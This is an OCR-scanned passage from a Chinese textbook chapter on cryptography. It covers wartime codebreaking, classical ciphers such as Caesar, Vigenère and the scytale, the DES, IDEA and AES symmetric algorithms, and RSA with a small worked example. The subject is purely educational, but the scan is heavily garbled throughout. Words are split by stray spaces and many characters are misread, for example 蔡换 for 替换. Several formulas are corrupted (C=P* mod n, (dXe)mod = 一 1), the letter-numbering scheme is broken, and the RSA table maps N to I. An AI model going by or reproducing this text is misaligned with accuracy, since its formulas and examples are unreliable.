的 烽火 就 是 一 种 传递 军情 的 方法 ,再 如 古代 的 兵 符 就 是 用 来 传达 信息 的 密令 ,这 些 都 促进 了 
密码 学 的 发 展 。 

密码 学 真正 成 为 科学 是 在 19 世纪 末 和 20 世纪 初期 ,由 于 军事 、 数 学 .通信 等 相关 技术 
的 发 展 , 特 别 是 两 次 世界 大 战 中 对 军事 信息 保密 传递 和 破获 敌 方 信息 的 需求 ,密码 学 得 到 了 
空前 的 发 展 , 并 广泛 地 应 用 于 军事 情报 部 门 的 决 
策 。 例 如 ,在 第 二 次 世界 大 战 之 前 ,德国 就 试验 
并 使 用 了 一 种 命名 为 “ 谜 ” 的 密码 机 ,如 图 5-1 所 
示 。“ 谜 ”密码 机 能 产生 220 亿 种 不 同 的 密 钥 组 
合 ,假如 一 个 人 日 夜 不 停 地 工作 ,每 分 钟 测试 一 
种 密 钥 ,需要 约 4. 2 万 年 才能 将 所 有 的 密 钥 可 能 
的 组 合 方式 测试 完 。 然 而 ,英国 获知 了 * 谜 ”密码 
机 的 密码 原理 ,完成 了 一 部 针对 “ 谜 ”密码 机 的 绰 
号 叫 “ 炸 弹 ” 的 密码 破译 机 ,如 图 5-2 所 示 , 每 秒 
钟 可 处 理 2000 个 字符 , 它 几乎 可 以 破译 截获 德 
国 的 所 有 情报 。 后 来 又 研制 出 一 种 每 秒 钟 可 处 图 51 “ 谜 * 密 码 机 
理 5000 个 字符 的 “巨人 ?型 密码 破译 机 并 投入 使 
用 ,至 此 同盟 国 几 乎 掌握 了 德国 纳粹 的 绝 大 多 数 军 事 秘 密 和 机 密 , 而 德国 军 方 却 对 此 一 无 所 
知 ;太平 洋 战 争 中 ,美军 成 功 破译 了 日 本 海军 的 密码 机 . 读 懂 了 日 本 舰队 司令 官 山 本 五 十 六 
发 给 各 指挥 官 的 命令 ,在 中 途 岛 彻底 击溃 了 日 本 海军 ,导致 太平 洋 战争 的 决定 性 转折 。 因 
此 ,可 以 说 密码 学 为 战争 的 胜利 立 了 大 功 。 今 天 ,密码 学 不 仅 用 于 国家 军事 安全 ,人 们 已 经 
将 重点 更 多 地 集中 在 实际 应 用 中 。 现 实生 活 中 就 有 很 多 密码 ,例如 为 了 防止 别人 查阅 你 的 
文件 ,可 以 将 你 的 文件 加 密 ; 为 了 防止 盗贼 窃取 你 的 钱 物 ,可 以 在 银行 账户 上 设置 密码 等 。 
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随 着 科技 的 发 展 和 信息 保密 的 需求 ,密码 学 的 应 用 融入 了 人 们 的 日 常生 活 。 





图 5-2 “炸弹 ”密码 破译 机 


密码 学 (cryptography) 一 词 来 自 于 希腊 语 中 的 短语 secret writing( 秘 密 地 书写 ) ,是 研 
究 数 据 的 加 密 及 其 变换 的 学 科 。 它 集 数 学 、 计 算 机 科学 、 电 子 与 通信 等 诸多 学 科 于 一 身 , 它 
包括 两 个 分 支 : 密码 编码 学 和 密码 分 析 学 。 密 码 编码 学 主要 研究 对 信息 进行 变换 ,以 保护 
信息 在 传递 过 程 中 不 被 敌 方 窃取 ,解读 和 利用 的 方法 ,而 密码 分 析 学 则 与 密码 编码 学 相反 ， 
它 主 要 研究 如 何 分 析 和 破译 密码 。 这 两 者 之 间 既 相互 对 立 又 相互 促进 。 

进入 20 世纪 80 年 代 , 随 着 计算 机 网 络 ,特别 是 因特网 的 普及 ,密码 学 受到 了 广泛 的 重 
视 。 如 今 ,密码 技术 不 仅 服务 于 信息 的 加 密 和 解密 ,还 是 身份 认证 ,访问 控制 ,数字 签名 等 多 
种 安全 机 制 的 基础 。 

加 密 技 术 包括 密码 算法 设计 、 密 码 分 析 、 安 全 协议 .身份 认证 、 消 息 确认 数字 签名 、 密 钥 
管理 、 密 钥 托管 等 技术 ,是 保障 信息 安全 的 核心 技术 。 

待 加 密 的 消息 称 为 明文 (plaintext) , 它 经 过 一 个 以 密 钥 (key ) 为 参数 的 函数 变换 ,这 个 
过 程 称 为 加 密 ,输出 的 结果 称 为 密 文 (ciphertext) ,然后 , 密 文 被 传送 出 去 ,往往 由 通信 员 或 
者 无 线 电 方式 来 传送 。 我 们 假设 敌人 或 者 入 侵 者 听 到 了 完整 的 密 文 ,并 且 将 密 文 精确 地 复 
制 下 来 。 然 而 ,与 目标 接收 者 不 同 的 是 ,他 不 知道 解密 密 钥 是 什么 ,所 以 他 无 法 轻易 地 对 密 
文 进行 解密 。 有 时 候 入侵 者 不 仅 可 以 监听 通信 信道 (被 动人 侵 者 ) ,而 且 还 可 以 将 消息 记录 
下 来 并 且 在 以 后 某 个 时 候 回 放出 来 .或 者 插入 他 自己 的 消息 ,或 者 在 合法 消息 到 达 接 收 方 之 
前 对 消息 进行 算 改 (主动 入 侵 者 )。 

用 一 种 合适 的 标记 法 将 明文 、 密 文 和 密 钥 的 关系 体现 出 来 .这 往往 会 非常 有 用 。 我 们 将 
使 用 C= Exk(P) 来 表示 用 密 钥 K 加 密 明 文 P 得 到 密 文 C ,类 似 地 ,P= Dr(C) 代 表 用 密 钥 开 
解密 密 文 C 得 到 明文 P 的 过 程 。 由 此 可 得 到 : 

Dk(Erk(P))=P 
这 种 标记 法 也 说 明了 和 D 只 是 数学 函数 ,事实 上 也 确实 如 此 。 

密码 学 的 基本 规则 是 ,你 必须 假定 密码 分 析 者 知道 加 密 和 解密 所 使 用 的 方法 。 即 密码 
分 析 者 知道 图 5-3 中 加 密 方法 E 和 解密 方法 D 的 所 有 工作 细节 。 每 次 当 老 的 加 解密 方法 
被 泄露 (或 者 认为 它们 已 被 泄露 ) 以 后 ,总 是 需要 极 大 的 努力 来 重新 设计 、 测 试 和 安装 新 的 算 
法 ,这 使 得 将 加 密 算法 本 身 保 持 秘密 的 做 法 在 现实 中 并 不 可 行 。 当 一 个 算法 已 不 再 保密 的 
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图 5-3 加 密 模 型 (假定 使 用 了 对 称 密 钥 密码 ) 


5.3.2 古典 密码 技术 


从 密码 学 发 展 历程 来 看 ,可 分 为 古典 密码 技术 (以 字符 为 基本 加 密 单元 的 密码 ) 以 及 现 
代 密 码 技术 (以 信息 块 为 基本 加 密 单 元 的 密码 ) 两 类 。 而 古典 密码 技术 有 着 悠久 的 历史 ,从 
古代 一 直到 计算 机 出 现 以 前 ,古典 密码 技术 主要 有 两 大 基本 方法 。 

(1) 蔡 换 密码 : 将 明文 的 字符 蔡 换 为 密 文中 的 另 一 种 的 字符 ,接收 者 只 要 对 密 文 做 反 
向 替换 就 可 以 恢复 出 明文 。 

(2) 移 位 密码 (又 称 置换 密码 ) : 明文 的 字母 保持 相同 ,但 顺序 (位 置 ) 被 打 乱 了 。 

古典 密码 算法 大 都 十 分 简单 ,现在 已 经 很 少 在 实际 应 用 中 使 用 了 。 但 是 对 古典 密码 学 
的 研究 ,对 于 理解 .构造 和 分 析 现 代 实 用 的 密码 都 是 很 有 帮助 的 ,下 面 是 几 种 简单 的 古典 密 
码 算法 。 

1. 滚 简 密 码 

在 古代 ,为 了 确保 通信 的 机 密 , 先 是 有 意识 地 使 用 一 些 简单 的 方法 对 信息 进行 加 密 。 如 
公元 六 年 前 的 古 希 腊 人 通过 使 用 一 根 叫 scytale 的 棍子 对 信息 进行 加 密 。 送 信人 先 将 一 张 
羊皮 条 绕 棍 子 螺 旋 形 卷 起 来 ,如 图 5-4 所 示 ,然后 把 要 写 的 信息 按 某 种 顺序 写 在 上 面 , 接 着 
打开 羊皮 条 卷 ,通过 其 他 渠道 将 信 送 给 收 信人 。 如 果 不 知道 棍子 的 直径 (这 里 作为 密 钥 ) 就 
不 容易 解密 里 面 的 内 容 , 但 是 收 信人 可 以 根据 事先 和 写 信 人 的 约定 ,用 同样 直径 的 scytale 
棍子 将 书信 和 解密 。 


RIAINIS1P1O 明文 为 
TRANSPOSITIONCIPHERS 
SII1ITI/ olN 
密 文 为 
C 1/ P HJEJR TRSCAIINTPSIHPOEONRS 


图 5-4 滚 简 密 码 








2. 撞 格 密码 
16 世纪 米兰 的 物理 学 家 和 数学 家 Cardano 发 明了 掩 格 密码 ,如 图 5-5 所 示 ,可 以 事先 设 
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计 好 方 格 的 开 孔 ,将 所 要 传递 的 信息 和 一 些 其 他 无 关 的 符号 组 合成 无 效 的 信息 ,使 截获 者 难 


以 分 析出 有 效 信息 。 


小 明 早 展 一 起 床 
就 看 到 课 上 放 着 
六 块 大 点心， 他 

极 了 ， 一 会 


开心 
儿 就 穿 好 了 衣服 。 


3. 棋盘 密码 




















明 早 
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[5] 





























5-5 掩 格 密码 


我 们 可 以 建立 一 张 表 ,如 图 5-6 所 示 ,使 每 一 个 字符 对 应 一 数 (该 字符 所 在 行 标号 十 列 
标号 ) ,这 样 将 明文 变 成 形式 为 一 串 数字 的 密 文 。 
例如 : 明文 为 battle on Sunday, 密 文 为 121144443115034330434533141154( 其 中 0 表 


示 空 格 ) 。 


4. 恺 撒 (CCaesar) 密 码 9 
据 记载 在 罗马 帝国 时 期 , 恺 撤 大 帝 曾经 设计 过 一 种 简单 的 人 2 和 ?了 5 
移 位 密码 ,用 于 战 时 通信 。 这 种 加 密 方法 就 是 将 明文 的 字母 按 ”下 
照 字母 顺序 , 往 后 依次 递 推 相同 的 位 数 ,就 可 以 得 到 加 密 的 密 3 L M N 0 PP 
文 , 而 解密 的 过 程 正好 和 加 密 的 过 程 相反 。 4 Q R Ss Tu 
例如 : 明文 battle on Sunday 密 文 yxqqib lk Prkaxv( 将 字 5 V W X Y 2 

图 5-6 棋盘 密码 


母 依次 后 移 3 位 , 即 天 一 一 


如 果 令 26 个 字母 分 别 对 应 于 整数 00 一 25( 用 两 位 数 表 





示 ),a 一 01,0 一 02,c 一 03，…， 


为 26 的 同 余 运算 , 即 : 


3 一 25,z= 一 00, 则 恺 撤 加 密 方 法 实际 上 是 进行 了 一 次 数学 取 模 


C= (P+K) mod 26 


其 中 己 是 对 应 的 明文 ;C 是 与 明文 对 应 的 密 文 数据 ;K 是 加 密 用 的 参数 ,又 称 密 钥 。 
如 : battle on Sunday 对 应 的 明文 数据 序列 为 020120201205 1514 192114040125。 
车 取 密 钥 为 5 时 , 则 密 文 数据 序列 为 070625251710 2019 240019090604。 


5. 圆 盘 密码 


由 Wee ee en 1 一 25) 的 方法 破解 ,人 们 又 


< 


如 
3 a 


图 5-7 圆 盘 密码 


进一步 将 其 改善 ,只 要 将 字母 按照 不 同 的 顺序 进行 移动 就 可 
以 提高 破解 的 难度 ,增加 信息 的 保密 程度 。 如 15 世纪 佛 罗 伦 
萨 人 Alberti 发 明 的 圆 盘 密 码 就 属于 这 种 典型 的 利用 单 表 置 
换 的 加 密 方法 。 在 两 个 同心 圆 盘 上 ,内盘 按 不 同 ( 杂 乱 ) 的 顺 
序 填 好 字母 或 数字 ,而 外 盘 按 照 一 定 顺 序 填 好 字母 或 数字 ,如 
图 5-7 所 示 ,转动 圆 盘 就 可 以 找到 字母 的 置换 方法 ,从 而 可 以 
很 方便 地 进行 信息 的 加 密 与 解密 。 恺 撤 密 码 与 圆 盘 密码 本 质 
上 都 是 一 样 的 ,都 属于 单 表 置 换 , 即 一 个 明文 字母 对 应 的 密 文 
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字母 是 确定 的 ,截获 者 可 以 分 析 字 母 出 现 的 频率 ,对 密码 体制 进行 有 效 的 攻击 。 

6. 弗吉尼亚 (Vigenere) 密 码 

为 了 提高 密码 破译 的 难度 ,人 们 又 发 明了 一 种 多 表 和 置换 的 密码 , 即 一 个 明文 字母 可 以 表 
示 为 多 个 密 文字 母 , 多 表 密码 加 密 算 法 结果 将 使 得 对 单 表 置换 用 的 简单 频率 分 析 方法 失效 ， 
其 中 弗吉尼亚 密码 就 是 一 种 典型 的 加 密 方 法 ,如 图 5-8 所 示 。 








加 
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图 5-8 弗吉尼亚 多 表 置 换 


弗吉尼亚 密码 是 使 用 一 个 词组 (或 语句 ) 作 为 密 钥 ,词组 中 每 一 个 字母 都 作为 移 位 替换 
密码 密 钥 确定 一 个 替换 表 , 弗 吉 尼 亚 密码 循环 地 使 用 每 一 个 替换 表 完 成 明文 字母 到 密 文字 
母 的 变换 ,最 后 所 得 到 的 密 文字 母 序列 即 为 加 密 得 到 的 密 文 ,具体 过 程 如 下 。 

例如 ,假设 明文 已 = data security, 密 钥 民 二 best。 可 以 先 将 已 分 解 为 长 为 4 的 序列 
data secu rity。 每 一 节 利 用 密 钥 = best 加 密 得 密 文 C 一 Ek (P) 二 EELT TIUN SMLR。 
当 密 钥 K 取 的 词组 很 长 时 ,截获 者 就 很 难 将 密 文 破解 。 


5.3.3 对称 密码 技术 


现代 密码 算法 不 再 依赖 算法 的 保密 ,而 是 把 算法 和 密 钥 分 开 , 其 中 ,算法 可 以 公开 ,而 密 
钥 是 保密 的 ,密码 系统 的 安全 性 在 于 保持 密 钥 的 保密 性 。 如 果 加 密 密 钥 和 解密 密 钥 相同 ,或 
可 以 从 一 个 推导 出 另 一 个 ,一 般 称 其 为 对 称 密 钥 或 单 钥 密码 体制 。 对 称 密码 技术 加 密 速度 
快 ,使 用 的 加 密 算法 简单 ,安全 强度 高 ,但 是 密 钥 的 完全 保密 较 难 实现 ,此 外 ,大 系统 中 密 铀 
的 管理 难度 也 较 大 。 

1. 对 称 密码 技术 原理 

对 称 加 密 算法 是 应 用 较 早 的 加 密 算法 ,技术 成 熟 。 在 对 称 加 密 算法 中 ,使 用 的 密 钥 只 有 
一 个 ,发 送 方 和 接收 方 都 使 用 这 个 密 钥 对 数据 进行 加 密 或 解密 ,这 就 要 求解 密 方 事先 必须 知 
道 加 密 密 钥 ,其 通信 模型 如 图 5-9 所 示 。 
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密 钥 K 
明文 mn _| 加 密 算法 密 文 C 解密 算法 | 明文 m 
C=Exm) m=DA(C) 
发 送 广 接收 方 


图 5-9 对 称 密 钥 密 码 体制 的 通信 模型 


对 称 密码 系统 的 安全 性 依赖 于 以 下 两 个 因素 : 第 一 ,加 密 算法 必须 足够 强 , 仅 仅 基 于 密 
文本 身 去 解密 信息 在 实践 上 是 不 可 能 的 ;第 二 ,加 密 方法 的 安全 性 依赖 于 密 钥 的 保密 性 ,而 
不 是 算法 的 秘密 性 。 对 称 密码 系统 可 以 以 硬件 或 软件 的 形式 实现 ,其 算法 的 实现 速度 很 快 ， 
并 得 到 了 广泛 的 应 用 。 

对 称 加 密 算 法 的 特点 是 算法 公开 ,计算 量 小 ,加密 速度 快 .加 密 效 率 高 。 不 足 之 处 是 通 
信 双 方 使 用 同一 个 密 钥 ,安全 性 得 不 到 保证 。 

此 外 ,如 果 及 个 用 户 相 互 之 间 进 行 保密 通信 ,车 每 对 用 户 使 用 不 同 的 对 称 密 钥 , 则 密 
钥 总 数 将 达到 n(n 一 1)/2 个 。 当 n 值 较 大 时 ,n(n 一 1)/2 的 值 会 很 大 ,这 使 得 密 钥 的 管理 
很 难 。 

常用 的 对 称 加 密 算法 有 DES IDEA 和 AES 等 。 

2. DES 算法 

DES 算法 的 发 明 人 是 IBM 公司 的 W. Tuchman 和 C. Meyer。 美 国 商业 部 国家 标准 局 
(NBS) 于 1973 年 5 月 和 1974 年 8 月 两 次 发 布 通告 ,公开 征求 用 于 计算 机 的 加 密 算法 ,经 评 
选 , 从 一 大 批 算法 中 采纳 了 IBM 的 LUCIFER 方案 ,该 算法 于 1976 年 11 月 被 美国 政府 采 
用 ,随后 被 美国 国家 标准 局 和 美国 国家 标准 协会 (ANSI) 承 认 , 并 于 1977 年 1 月 以 数据 加 密 
标准 DES(data encryption standard) 的 名 称 正式 向 社会 公布 ,并 于 1977 年 7 月 15 日 生效 。 

DES 算法 是 一 种 对 二 元 数据 进行 加 密 的 分 组 密码 ,数据 分 组 长 度 为 64 位 (8 字 节 ), 密 
文 分 组 长 度 也 是 64 位 ,没有 数据 扩展 。 密 钥 长 度 为 64 位 ,其 中 有 效 密 钥 长 度 为 56 位 ,其 余 
8 位 作为 奇偶 校 验 。DES 的 整个 体制 是 公开 的 ,系统 的 安全 性 主要 依赖 密 钥 的 保密 ,其 算法 
主要 由 初始 置换 IP、16 轮 和 迭代 的 乘积 变换 、 逆 初始 置换 IP-: 以 及 16 个 子 密 钥 产生 器 构成 。 
56 位 DES 加 密 算 法 的 框图 如 图 5-10 所 示 。 

DES 加 密 算 法 框图 中 ,明文 加 密 过 程 如 下 。 

(1) 将 长 的 明文 分 割 成 64 位 的 明文 段 , 逐 段 加 密 。 将 64 位 明文 段 首先 进行 与 密 钥 无 
关 的 初始 置换 处 理 。 

(2) 初始 置换 后 的 结果 要 进行 16 次 的 迭代 处 理 . 每 次 迭代 的 框图 相同 ,但 参加 迭代 的 
密 钥 不 同 , 密 钥 共 56 位 ,分 成 左右 两 个 28 位 .第 i 次 迭代 用 密 钥 kK; 参加 操作 ,第 i 次 迭代 
完成 后 ,左右 28 位 的 密 钥 都 作 循环 移 位 ,形成 第 i 十 1 次 迭代 的 密 钥 。 

(3) 经 过 16 次 迭代 处 理 后 的 结果 进行 左右 32 位 的 互 换 位 置 。 

(4) 将 结果 进行 一 次 与 初始 置换 相 逆 的 还 原 置换 处 理 , 得 到 了 64 位 的 密 文 。 

上 述 加 密 过 程 中 的 基本 运算 包括 置换 .替代 和 异 或 运算 。DES 算法 是 一 种 对 称 算 法 
( 单 钥 加 密 算法 ), 既 可 用 于 加 密 , 也 可 用 于 解密 。 解 密 的 过 程 和 加 密 时 相似 ,但 密 钥 使 用 顺 
序 刚好 相反 。 
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64 位 明文 56 位 密 钥 
1 1 
初始 置换 置换 选择 1 
1 Kk 1 
第 1 轮 送 代 [一 一 置换 选择 2 | 一 一 一 了 循环 左 移 














1 | 
第 2 轮 迭 代 | 一 | 置换 选择 | 一 一 | 循环 左 移 

















第 16 轮 送 代 [= 一 一 和 置换 选择 2 | 一 一 | 循环 左 移 





1 
左右 32 位 互 换 




















1 
逆 初 始 置换 





64 位 密 文 
5-10 56 位 DES 加 密 算 法 的 框图 


DES 是 一 种 分 组 密码 ,是 两 种 基本 的 加 密 组 块 蔡 代 和 置换 的 细致 而 复杂 的 结合 , 它 通 
过 反复 依次 应 用 这 两 项 技术 来 提高 其 强度 ,经 过 共 16 轮 的 替代 和 置换 的 变换 后 ,使 得 密码 
分 析 者 无 法 获得 该 算法 一 般 特性 以 外 的 更 多 信息 。 对 于 DES 加 密 , 除 了 尝试 所 有 可 能 的 密 
钥 外 ,还 没有 已 知 的 技术 可 以 求 得 所 用 的 密 钥 。DES 算法 可 以 通过 软件 或 硬件 来 实现 。 

自 DES 成 为 美国 国家 标准 以 来 ,已 经 有 许多 公司 设计 并 推广 了 实现 DES 算法 的 产品 ， 
有 的 设计 专用 LSI 器 件 或 芯片 ,有 的 用 现成 的 微 处 理 器 实现 ,有 的 只 限于 实现 DES 算法 ,有 
的 则 可 以 运行 各 种 工作 模式 。 

针对 DES 密 钥 短 的 问题 ,科学 家 又 研制 了 三 重 DES( 或 称 3DES) ,把 密 钥 长 度 提高 到 
112 或 168 位 。 

3. IDEA 算法 

国际 数据 加 密 算 法 IDEA 是 由 瑞士 科学 工作 者 提出 的 , 它 于 1990 年 正式 公布 并 在 之 后 
得 到 增强 。IDEA 算法 是 在 DES 算法 的 基础 上 发 展 而 来 的 ,类 似 于 三 重 DES。 它 也 是 对 
64 位 大 小 的 数据 块 加 密 的 分 组 加 密 算法 , 密 钥 长 度 为 128 位 , 它 基 于 “ 相 异 代数 群 上 的 混合 
运算 ?思想 设计 算法 ,用 硬件 和 软件 实现 都 很 容易 ,上 且 比 DES 在 实现 上 快 很 多 。IDEA 自问 
世 以 来 ,已 经 历 了 大 量 的 验证 ,对 密码 分 析 具 有 很 强 的 抵抗 能 力 ,在 多 种 商业 产品 中 被 使 用 。 
IDEA 的 密 钥 长 度 为 128 位 ,这 么 长 的 密 钥 在 今后 若干 年 内 应 该 是 安全 的 。 

IDEA 算法 也 是 一 种 数据 块 加 密 算法 , 它 设 计 了 一 系列 的 加 密 轮 次 ,每 轮 加 密 都 使 用 从 
完整 的 加 密 密 钥 中 生成 的 一 个 子 密 钥 。 与 DES 不 同 之 处 在 于 , 它 采 用 软件 实现 和 硬件 实现 
同样 快速 。 

由 于 IDEA 是 在 美国 之 外 提出 并 发 展 起 来 的 , 避 开 了 美国 法 律 上 对 加 密 技术 的 诸多 限 
制 , 因 此 ,有 关 IDEA 算法 和 实现 技术 的 书籍 可 以 自由 出 版 和 交流 , 极 大 地 促进 了 IDEA 的 
发 展 和 完善 。 
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4. AES 算法 

密码 学 中 的 AES(advanced encryption standard, 高 级 加 密 标准 ) 算 法 ,又 称 Rijndael 加 
密 算法 ,是 美国 联邦 政府 采用 的 一 种 区 块 加 密 标准 。 这 个 标准 用 来 替代 原先 的 DES, 已 经 
被 多 方 分 析 且 广 为 全 世界 所 使 用 。 经 过 五 年 的 甄选 流程 ,高 级 加 密 标 准 由 美国 国家 标准 与 
技术 研究 院 (NIST) 于 2001 年 11 月 26 日 发 布 于 FIPS PUB 197, 并 在 2002 年 5 月 26 日 成 
为 有 效 的 标准 。2006 年 ,高 级 加 密 标准 已 然 成 为 对 称 密 钥 加 密 中 最 流行 的 算法 之 一 。 

该 算法 是 由 比利时 密码 学 家 Joan Daemen 和 Vincent Rijmen 所 设计 的 ,结合 两 位 作者 
的 名 字 ,命名 为 Rijndael。 

AES 是 美国 国家 标准 技术 研究 所 NIST 旨 在 取代 DES 的 21 世纪 的 加 密 标准 。 

AES 的 基本 要 求 是 ,采用 对 称 分 组 密码 体制 , 密 钥 长 度 为 128、192、256 位 ,分 组 长 度 为 
128 位 ,算法 应 易于 各 种 硬件 和 软件 实现 。1998 年 NIST 开始 AES 第 一 轮 分 析 、 测 试 和 征 
集 , 共 产生 了 15 个 候选 算法 。1999 年 3 月 完成 了 第 二 轮 AES 的 分 析 、 测 试 。2000 年 10 月 
2 日 美国 政府 正式 宣布 选中 比利时 密码 学 家 Joan Daemen 和 Vincent Rijmen 提出 的 一 种 密 
码 算法 Rijndael 作为 AES 。 

在 应 用 方面 ,尽管 DES 在 安全 上 是 脆弱 的 ,但 由 于 快速 DES 芯片 的 大 量 生产 ,使 得 
DES 仍 能 暂时 继续 使 用 ,为 提高 安全 强度 ,通常 使 用 独立 密 钥 的 三 重 DES。 但 是 DES 迟早 
要 被 AES 所 替换 。 

目前 , 几 种 对 称 加 密 算 法 都 在 不 同 的 场合 得 到 具体 应 用 , 几 种 对 称 加 密 算法 的 比较 如 
表 5-1 所 示 。 

表 5-1 几 种 对 称 加 密 算 法 的 比较 














算法 密 钥 长 度 (bit) 分 组 长 度 (bit) 循环 次 数 
DES 56 64 16 

三 重 DES 112、168 64 48 

IDEA 128 64 8 

AES 128、192、256 128 10、12、14 











s.3.4 非 对 称 密码 技术 


车 加 密 密 钥 和 解密 密 钥 不 相同 .或 从 其 中 一 个 难以 推出 另 一 个 , 则 称 为 非 对 称 密码 技术 
或 双 钥 密码 技术 ,也 称 为 公开 密 钥 技 术 。 非 对 称 密码 算法 使 用 两 个 完全 不 同 但 又 完全 匹配 
的 一 对 密 钥 一 一 公 钥 和 私 钥 。 公 和 钥 是 可 以 公开 的 ,而 私 钥 是 保密 的 。 

1. 非 对 称 密码 技术 原理 

1976 年 ,Diffie 和 Hellman 在 “密码 学 的 新 方向 ”一 文中 提出 了 公开 密 钥 密 码 体 制 的 思 
想 , 开 创 了 现代 密码 学 的 新 领域 。 

非 对 称 密码 技术 的 加 密 密 钥 和 解密 密 钥 不 相同 .它们 的 值 不 等 ,属性 也 不 同 , 一 个 是 可 
以 公开 的 公 钥 ; 另 一 个 则 是 需要 保密 的 私 钥 。 非 对 称 密码 技术 的 特点 是 加 密 能 力 和 解密 能 
力 是 分 开 的 , 即 加 密 与 解密 的 密 钥 不 同 ,或 从 一 个 难以 推出 另 一 个 。 它 可 以 实现 多 个 用 户 用 
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公 钥 加 密 的 消息 只 能 由 一 个 用 户 用 私 钥 解读 ,或 反 过 来 ,由 一 个 用 户 用 私 钥 加 密 的 消息 可 被 
多 个 用 户 用 公 钥 解读 。 其 中 前 一 种 方式 可 用 于 在 公共 网 络 中 实现 保密 通信 ;后 一 种 方式 可 
用 于 在 认证 系统 中 对 消息 进行 数字 签名 。 

非 对 称 密 钥 密码 体制 的 通信 模型 如 图 5-11 所 示 。 









































公开 密 钥 PK 私有 密 钥 SK 
加 密 解密 
明文 m 加 密 算法 密 文 C 解密 算法 明文 m 
C=Epx(m) m=Dsx(C) 
发 送 广 接收 方 


图 5-11 非 对 称 密 钥 密码 体制 的 通信 模型 


非 对 称 加 密 算法 的 主要 特点 如 下 。 

(1) 用 加 密 密 钥 PK( 公 钥 ) 对 明文 m 加 密 后 得 到 密 文 , 再 用 解密 密 钥 SK( 私 钥 ) 对 密 文 
解密 , 即 可 恢复 出 明文 m, 即 

Desk (Epk (1m))=m 
(2) 加 密 密 钥 不 能 用 来 解密 , 即 
Dpk (Epk (1m)) 1m Ds (Esr (1m)) 天 7 

(3) 用 PK 加 密 的 信息 只 能 用 SK 解密 ;用 SK 加 密 的 信息 只 能 用 PK 解密 。 

(4) 从 已 知 的 PK 不 可 能 推导 出 SK 。 

(5) 加 密 和 解密 的 运算 可 对 调 , 即 

Epkr (Dex (m))=m 

非 对 称 密码 体制 大 大 简化 了 复杂 的 密 钥 分 配 管理 问题 ,但 非 对 称 加 密 算法 要 比 对 称 加 
密 算法 慢 得 多 ( 约 差 1000 倍 ) 。 因 此 ,在 实际 通信 中 , 非 对 称 密码 体制 主要 用 于 认证 (比如 数 
字 签 名 .身份 识别 等 ) 和 密 钥 管理 等 ,而 消息 加 密 仍 利用 对 称 密码 体制 。 非 对 称 密码 体制 的 
杰出 代表 是 RSA 算法 。 

2. RSA 算法 

RSA 算法 是 由 美国 麻 省 理工 学 院 的 Rivest、Shamir 和 Adleman 三 位 科学 家 设计 的 用 
数论 构造 双 钥 的 方法 ,是 公开 密 钥 密码 系统 的 加 密 算法 的 一 种 , 它 不 仅 可 以 作为 加 密 算 法 来 
使 用 ,而 且 可 以 用 作 数 字 签名 和 密 钥 分 配 与 管理 。RSA 在 全 世界 已 经 得 到 了 广泛 的 应 用 ， 
ISO 在 1992 年 颁布 的 国际 标准 X. 509 中 ,将 RSA 算法 正式 纳入 国际 标准 。1999 年 ,美国 
参议 院 通过 立法 ,规定 电子 数字 签名 与 手写 签名 的 文件 .邮件 在 美国 具有 同等 的 法 律 效力 。 
我 国 也 于 2004 年 8 月 28 日 发 布 了 (电子 签名 法 》. 并 于 2005 年 4 月 1 日 起 施行 。 在 因特网 
中 广泛 使 用 的 电子 邮件 和 文件 加 密 软 件 PGP(pretty good privacy) 也 将 RSA 作为 传送 会 话 
密 钥 和 数字 签名 的 标准 算法 。RSA 算法 的 安全 性 建立 在 数论 中 “大 数 分 解 和 素数 检测 ”的 
理论 基础 上 。 

1) RSA 算法 表述 

(1) 首先 选择 两 个 大 素数 p 和 g( 典 型 地 应 大 于 10”, 且 p 和 g 是 保密 的 ) 。 

(2) 计算 n= 二 pXg 和 z= 二 (p 一 1)X(g 一 1),z 是 保密 的 。 
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(3) 选择 一 个 与 = 互 素 ( 没 有 公 因 子 ) 的 数 d。 

(4) 找到 e, 使 其 满足 (dXe)mod = 一 1。 

(5) 公 钥 为 (e,n) ,而 私 钥 为 (d ,n)。 

计算 出 这 些 参数 后 ,下 面 就 可 以 执行 加 /解密 了 。 首 先 将 明文 (可 以 看 作 一 个 位 串 ) 分 成 
块 , 每 块 有 位 (最 后 一 块 可 以 小 于 & 位), 这 里 & 是 满足 关 一 2 的 最 大 数 。 为 了 加 密 一 个 消 
息 P, 可 计算 C=P* mod n。 为 了 解密 C, 只 要 计算 P=C? modn 即 可 。 可 以 证 明 , 对 于 指定 
范围 内 的 所 有 了 ,加 密 和 解密 函数 互 为 反 函 数 。 为 了 执行 加 密 ,你 需要 ee 和 ;为 了 执行 解 
密 , 你 需要 d 和 nn。 因 此 , 公 钥 是 由 (e,n) 对 组 成 的 ,而 私 钥 是 由 (d,n) 对 组 成 的 。 

图 5-12 举例 说 明了 RSA 算法 是 如 何 工 作 的 。 











明文 (P) 密 文 (C) 解密 后 
一 人 一 
符号 ”数值 BP Pmod 33) Cd Ci(mod 33) ”符号 
19 6859 28 13492928512 19 S 
U 21 9261 21 1801088541 21 U 
Zz 26 17576 20 1280000000 26 z 
A 01 1 1 1 1 A 
N 14 2744 3 78125 14 N 
N 14 2744 5 78125 14 I 
E 05 125 26 8031810176 5 E 
发 送 方 的 计算 
接收 方 的 计算 


5-12 RSA 算法 用 例 


这 里 ,我们 选择 p= 二 3,g= 二 11( 实 际 中 pg 为 大 质数 ) 。 

则 n=pXg=33,z=(p 一 1)X(g—1)=20。 

因为 7 与 20 互 素 ,可 以 选择 4 二 7。 

使 等 式 (7Xe) mod 20 二 1 成 立 的 7Xe 值 有 21、41、61、81、101*……: 所 以 选择 e 二 3。 

对 原始 信息 已 加 密 : 即 计 算 密 文 C= Ps mod 33 ,使 用 公开 密 钥 为 (3,33) 。 

对 加 密 信息 C 解密 : 即 计算 明文 P=C" mod 33, 使 用 私有 密 钥 为 (7.33) 。 

P= 二 2: 二 33, 取 二 5, 即 用 5bit 表示 一 个 信息 ,有 32( 一 2) 种 表示 。 分 别 用 其 中 的 1 一 
26 表示 26 个 英文 字母 A 一 Z。 

如 明文 为 SUZANNE 可 表示 为 19 21 26 01 14 14 05。 

2) RSA 安全 性 分 析 

RSA 的 保密 性 基于 一 个 数学 假设 : 对 一 个 很 大 的 合 数 进行 质 因数 分 解 是 不 可 能 的 。 
车 RSA 用 到 的 两 个 质数 足够 大 ,可 以 保证 使 用 目前 的 计算 机 无 法 分 解 。 即 RSA 公开 密 钥 
密码 体制 的 安全 性 取决 于 从 公开 密 钥 (n,e) 计 算出 私有 密 钥 (n,d) 的 困难 程度 。 想 要 从 公 
